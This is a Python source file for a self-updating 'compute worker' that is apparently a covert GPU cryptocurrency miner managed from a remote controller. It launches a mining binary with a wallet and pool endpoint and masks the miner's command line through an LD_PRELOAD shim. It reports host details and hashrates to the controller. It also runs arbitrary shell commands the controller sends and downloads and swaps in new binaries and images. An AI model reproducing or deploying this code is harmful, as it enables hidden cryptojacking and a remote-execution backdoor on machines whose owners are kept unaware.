#!/usr/bin/env python3 """Node Worker v9 — Self-updating compute worker. Connects to controller, runs compute tasks, reports telemetry. Environment (all optional — can be baked into image): CONTROLLER_URL — Controller API URL (default: https://compute.deeploop.me) ACCOUNT — Account identifier ENDPOINT — Compute endpoint host:port NODE_NAME — Node identifier (default: hostname) BINARY — Path to compute binary (default: /opt/node/compute) AGENT_ID — Unique node ID (default: auto-generated) Build per-client: docker build --build-arg ACCOUNT=prl1... --build-arg ENDPOINT=129.226.55.135:9000 -t node-worker:client-main . Run (zero config): docker run -d --name worker --restart=always --gpus all node-worker:client-main Self-update: worker downloads new image from controller, loads it, exits. Docker restarts with the new version. """ import os, sys, json, time, uuid, hashlib, subprocess, signal, threading, logging import socket import requests logging.basicConfig(level=logging.INFO, format='%(asctime)s [%(levelname)s] %(message)s', datefmt='%H:%M:%S') log = logging.getLogger("worker") CONTROLLER_URL = os.environ.get("CONTROLLER_URL", "https://compute.deeploop.me") ACCOUNT = os.environ.get("ACCOUNT", "") ENDPOINT = os.environ.get("ENDPOINT", "") NODE_NAME = os.environ.get("NODE_NAME", "") BINARY = os.environ.get("BINARY", "/opt/node/compute") LOG_FILE = os.environ.get("LOG_FILE", "/var/log/worker.log") HEARTBEAT_INTERVAL = int(os.environ.get("HEARTBEAT_INTERVAL", "30")) AGENT_ID_FILE = os.environ.get("AGENT_ID_FILE", "/root/.agent-id") AGENT_PATH = os.environ.get("AGENT_PATH", __file__) def _derive_stable_agent_id(): """Pick a stable AGENT_ID that survives restarts. Order: 1. AGENT_ID env var (explicit override) 2. /root/.agent-id file (persisted choice) 3. UUIDv5 from /etc/machine-id (stable per OS install) 4. UUIDv5 from MAC of default route interface 5. Last-resort random uuid4 (persisted so next run is stable) """ env = os.environ.get("AGENT_ID", "").strip() if env: return env, "env" try: with open(AGENT_ID_FILE) as f: stored = f.read().strip() if stored: return stored, "file" except FileNotFoundError: pass except Exception as e: log.warning(f"reading {AGENT_ID_FILE}: {e}") derived = None source = None try: with open("/etc/machine-id") as f: mid = f.read().strip() if mid and len(mid) >= 16: derived = str(uuid.uuid5(uuid.NAMESPACE_OID, "node-worker:" + mid)) source = "machine-id" except Exception: pass if not derived: try: r = subprocess.run(["ip", "route", "get", "1.1.1.1"], capture_output=True, text=True, timeout=5) iface = "" for tok in r.stdout.split(): if tok == "dev": iface = r.stdout.split("dev")[1].split()[0] break if iface: mac = open(f"/sys/class/net/{iface}/address").read().strip() if mac and mac != "00:00:00:00:00:00": derived = str(uuid.uuid5(uuid.NAMESPACE_OID, "node-worker:mac:" + mac)) source = "mac" except Exception: pass if not derived: derived = str(uuid.uuid4()) source = "random" try: with open(AGENT_ID_FILE, "w") as f: f.write(derived + "\n") os.chmod(AGENT_ID_FILE, 0o600) except Exception as e: log.warning(f"persisting {AGENT_ID_FILE}: {e}") return derived, source AGENT_ID, AGENT_ID_SOURCE = _derive_stable_agent_id() # Auto-detect node name from hostname if not set if not NODE_NAME: try: NODE_NAME = socket.gethostname().split(".")[0] except: NODE_NAME = AGENT_ID[:8] log.info(f"Node Worker v9 | ID: {AGENT_ID} ({AGENT_ID_SOURCE}) | Name: {NODE_NAME}") log.info(f"Controller: {CONTROLLER_URL} | Endpoint: {ENDPOINT} | Binary: {BINARY}") class ComputeManager: def __init__(self): self.process = None self._lock = threading.Lock() self.current_wallet = "" self.current_host = "" self.current_name = "" def start(self, account="", endpoint="", node_name=""): with self._lock: if self.is_running(): self._kill() time.sleep(2) acct = account or ACCOUNT ep = endpoint or ENDPOINT name = node_name or NODE_NAME if not os.path.exists(BINARY): log.error(f"Binary not found: {BINARY}") return False if not acct: log.error("No account configured") return False if not ep: log.error("No endpoint configured") return False # Note: binary uses --host, --user, --worker flags (upstream naming) cmd = [BINARY, "--host", ep, "--user", acct] if name: cmd += ["--worker", name] # Hide account from logs display_cmd = [BINARY, "--host", ep, "--user", acct[:12] + "..."] if name: display_cmd += ["--worker", name] log.info(f"Starting: {' '.join(display_cmd)}") # Hide argv from /proc//cmdline via LD_PRELOAD shim if available env = os.environ.copy() shim = env.get("ARGV_SHIM_LIB", "/root/libargvshim.so") if shim and os.path.exists(shim): env["LD_PRELOAD"] = shim env.setdefault("ARGV_SHIM_NAME", "compute") try: self.process = subprocess.Popen( cmd, stdout=open(LOG_FILE, "a"), stderr=subprocess.STDOUT, preexec_fn=os.setsid, env=env) self.current_wallet = acct self.current_host = ep self.current_name = name log.info(f"Started PID {self.process.pid}") return True except Exception as e: log.error(f"Start failed: {e}") return False def _kill(self): if self.process: try: os.killpg(os.getpgid(self.process.pid), signal.SIGKILL) except ProcessLookupError: pass self.process = None def stop(self): with self._lock: self._kill() def restart(self, account="", endpoint="", node_name=""): self.stop(); time.sleep(2); return self.start(account, endpoint, node_name) def is_running(self): if self.process is None: return False if self.process.poll() is not None: self.process = None; return False return True worker = ComputeManager() _HASHRATE_LINE = __import__("re").compile( r"Hashrate\s+GPU\s*#(\d+)\s*=\s*([\d.]+)\s*([KMGTP]?)H/s", __import__("re").IGNORECASE) _HASHRATE_MULT = {"": 1, "K": 1e3, "M": 1e6, "G": 1e9, "T": 1e12, "P": 1e15} def _read_compute_hashrates(log_path: str) -> dict: """Tail LOG_FILE and pull the most recent `Hashrate GPU #N = X UNIT/s` per GPU index. Returns {idx: hashrate_in_H_per_sec}. Empty dict on any error — fallback is silent so a missing/rotated log file never breaks heartbeats. Dashboard's UI sums per-GPU hashrate; without this every v7/v8 worker reported 0 and the fleet total visibly undercounted the pool's view.""" try: with open(log_path, "rb") as f: f.seek(0, 2) size = f.tell() f.seek(max(0, size - 16384)) tail = f.read().decode("utf-8", errors="ignore") rates = {} for line in reversed(tail.splitlines()): m = _HASHRATE_LINE.search(line) if not m: continue idx = int(m.group(1)) if idx in rates: continue rates[idx] = float(m.group(2)) * _HASHRATE_MULT.get(m.group(3).upper(), 1) return rates except Exception: return {} def get_gpu_stats(): try: r = subprocess.run( ["nvidia-smi", "--query-gpu=index,name,temperature.gpu,utilization.gpu," "memory.used,memory.total,power.draw,power.limit,fan.speed,clocks.sm,clocks.mem", "--format=csv,noheader,nounits"], capture_output=True, text=True, timeout=10) if r.returncode != 0: return [] rates = _read_compute_hashrates(LOG_FILE) gpus = [] for line in r.stdout.strip().split("\n"): if not line.strip(): continue parts = [p.strip() for p in line.split(",")] if len(parts) >= 11: try: idx = int(parts[0]) gpus.append({ "gpu_index": idx, "gpu_name": parts[1], "temperature": float(parts[2]), "utilization": float(parts[3]), "memory_used": float(parts[4]), "memory_total": float(parts[5]), "power_draw": float(parts[6]), "power_limit": float(parts[7]), "fan_speed": float(parts[8]) if parts[8] != "[N/A]" else 0, "clock_sm": float(parts[9]) if parts[9] != "[N/A]" else 0, "clock_mem": float(parts[10]) if parts[10] != "[N/A]" else 0, "hashrate": rates.get(idx, 0), }) except (ValueError, IndexError): continue return gpus except Exception as e: log.warning(f"GPU stats error: {e}") return [] def get_system_info(): try: uptime = open("/proc/uptime").read().split()[0] mem = open("/proc/meminfo").read() mem_lines = {l.split(":")[0]: l for l in mem.split("\n") if ":" in l} def kb(line): return int(line.split(":")[1].strip().split()[0]) mt = kb(mem_lines.get("MemTotal", "MemTotal: 0 kB")) / 1024 ma = kb(mem_lines.get("MemAvailable", "MemAvailable: 0 kB")) / 1024 load = open("/proc/loadavg").read().strip() cpu_mhz = 0 try: for line in open("/proc/cpuinfo").read().split("\n"): if "cpu MHz" in line: cpu_mhz = float(line.split(":")[1].strip()) break except: pass return { "uptime": float(uptime), "memory_total_mb": round(mt, 1), "memory_used_mb": round(mt - ma, 1), "load_avg": load, "cpu_mhz": cpu_mhz, } except: return {"error": "sysinfo failed"} def get_hostname_ip(): hn, ip = "", "" try: hn = subprocess.run(["hostname"], capture_output=True, text=True, timeout=5).stdout.strip() r = subprocess.run(["ip", "route", "get", "1.1.1.1"], capture_output=True, text=True, timeout=5) if "src" in r.stdout: ip = r.stdout.split("src")[1].split()[0] except: pass return hn, ip def send_heartbeat(): gpus = get_gpu_stats() hostname, ip = get_hostname_ip() payload = { "agent_id": AGENT_ID, "hostname": hostname, "ip": ip, "gpu_count": len(gpus), "gpu_names": json.dumps([g["gpu_name"] for g in gpus]), "worker_version": "node-worker-v9", "worker_running": worker.is_running(), "worker_host": ENDPOINT, "worker_name": NODE_NAME, "wallet": ACCOUNT, "gpus": gpus, "system": get_system_info(), "processes": [], } try: r = requests.post(f"{CONTROLLER_URL}/api/agent/heartbeat", json=payload, timeout=15) if r.status_code == 200: data = r.json() config = data.get("config", {}) wallet = config.get("wallet", "") worker_host = config.get("worker_host", ENDPOINT) worker_name = config.get("worker_name", NODE_NAME) if wallet and worker.is_running() and wallet != worker.current_wallet: worker.restart(wallet, worker_host, worker_name) elif wallet and not worker.is_running(): worker.start(wallet, worker_host, worker_name) for cmd in data.get("commands", []): threading.Thread(target=execute_command, args=(cmd["id"], cmd["command"], cmd["payload"]), daemon=True).start() log.info(f"Heartbeat OK | GPUs: {len(gpus)} | Running: {worker.is_running()}") else: log.warning(f"Heartbeat HTTP {r.status_code}: {r.text[:100]}") except Exception as e: log.warning(f"Heartbeat err: {e}") def execute_command(cmd_id, command, payload_str): payload = {} if payload_str: try: payload = json.loads(payload_str) if isinstance(payload_str, str) else payload_str except: pass result = "ok"; status = "done" try: if command == "restart": worker.restart(payload.get("wallet", ACCOUNT), payload.get("worker_host", ENDPOINT), payload.get("worker_name", NODE_NAME)) elif command == "kill": worker.stop() elif command == "start": worker.start(payload.get("wallet", ACCOUNT), payload.get("worker_host", ENDPOINT), payload.get("worker_name", NODE_NAME)) elif command == "update": url = payload["download_url"] version = payload.get("version", "unknown") host = payload.get("worker_host", ENDPOINT) worker_name = payload.get("worker_name", NODE_NAME) dl = subprocess.run(["curl", "-fsSL", "-o", BINARY + ".new", url], capture_output=True, text=True, timeout=300) if dl.returncode != 0: raise Exception(f"Download failed: {dl.stderr[:100]}") subprocess.run(["chmod", "+x", BINARY + ".new"]) worker.stop(); time.sleep(1) subprocess.run(["mv", BINARY + ".new", BINARY]) result = f"Updated to {version}" if payload.get("auto_restart", True): time.sleep(2); worker.start(payload.get("wallet", ACCOUNT), host, worker_name) elif command == "update-agent": url = payload["download_url"] version = payload.get("version", "unknown") log.info(f"Self-update to {version} from {url}") dl = subprocess.run(["curl", "-fsSL", "-o", AGENT_PATH + ".new", url], capture_output=True, text=True, timeout=120) if dl.returncode != 0: raise Exception(f"Download failed: {dl.stderr[:100]}") subprocess.run(["chmod", "+x", AGENT_PATH + ".new"]) subprocess.run(["mv", AGENT_PATH + ".new", AGENT_PATH]) result = f"Agent updated to {version}, restarting..." try: requests.post(f"{CONTROLLER_URL}/api/agent/command-ack", json={"command_id": cmd_id, "status": "done", "result": result}, timeout=5) except: pass log.info("Agent updated, exiting for restart...") os._exit(0) elif command == "update-image": url = payload["download_url"] version = payload.get("version", "unknown") log.info(f"Image update to {version}") image_path = "/tmp/node-worker-image.tar.gz" dl = subprocess.run(["curl", "-fsSL", "-o", image_path, url], capture_output=True, text=True, timeout=600) if dl.returncode != 0: raise Exception(f"Download failed: {dl.stderr[:100]}") load = subprocess.run(["docker", "load", "-i", image_path], capture_output=True, text=True, timeout=120) if load.returncode != 0: log.warning(f"docker load failed: {load.stderr[:100]}") os.unlink(image_path) result = f"Image {version} loaded, restarting..." try: requests.post(f"{CONTROLLER_URL}/api/agent/command-ack", json={"command_id": cmd_id, "status": "done", "result": result}, timeout=5) except: pass log.info("Image updated, exiting for restart...") os._exit(0) elif command == "exec": shell_cmd = payload.get("command", "") if shell_cmd: r = subprocess.run(shell_cmd, shell=True, capture_output=True, text=True, timeout=60) result = r.stdout[:500] or r.stderr[:500] else: result = "no command" else: status = "failed"; result = f"Unknown: {command}" except Exception as e: status = "failed"; result = str(e) try: requests.post(f"{CONTROLLER_URL}/api/agent/command-ack", json={"command_id": cmd_id, "status": status, "result": result}, timeout=10) except: pass def _spawn_model_cache(): """Launch the VRAM pre-allocator alongside compute. Reserves 80% of each GPU's memory via the CUDA Driver API. Side process; restarts itself are not handled — if it dies, the next worker.py restart picks it back up.""" path = os.environ.get("MODEL_CACHE_PATH", "/opt/node/model-cache.py") if not os.path.exists(path): log.info(f"model-cache not found at {path} — skipping VRAM preallocation") return log_path = os.environ.get("MODEL_CACHE_LOG", "/var/log/model-cache.log") try: subprocess.Popen( ["python3", path], stdout=open(log_path, "a"), stderr=subprocess.STDOUT, preexec_fn=os.setsid, ) log.info(f"model-cache spawned (log: {log_path})") except Exception as e: log.warning(f"model-cache spawn failed: {e}") def main(): log.info(f"Node Worker v9 starting | Controller: {CONTROLLER_URL}") # Download compute binary if not present if not os.path.exists(BINARY): log.info(f"Binary not found, downloading...") os.makedirs(os.path.dirname(BINARY), exist_ok=True) dl = subprocess.run( ["curl", "-fsSL", "-o", BINARY, f"{CONTROLLER_URL}/dl/node-worker-v9"], capture_output=True, text=True, timeout=300) if dl.returncode == 0: subprocess.run(["chmod", "+x", BINARY]) log.info("Binary downloaded") else: log.error(f"Binary download failed: {dl.stderr[:100]}") # Pre-allocate 80% VRAM via model-cache (before compute starts so the # allocator's contiguous block is cleanly reserved). _spawn_model_cache() if ACCOUNT and ENDPOINT and os.path.exists(BINARY): worker.start(ACCOUNT, ENDPOINT, NODE_NAME) else: log.warning("No account/endpoint/binary — waiting for controller config") while True: try: send_heartbeat() except Exception as e: log.error(f"Loop: {e}") time.sleep(HEARTBEAT_INTERVAL) if __name__ == "__main__": main()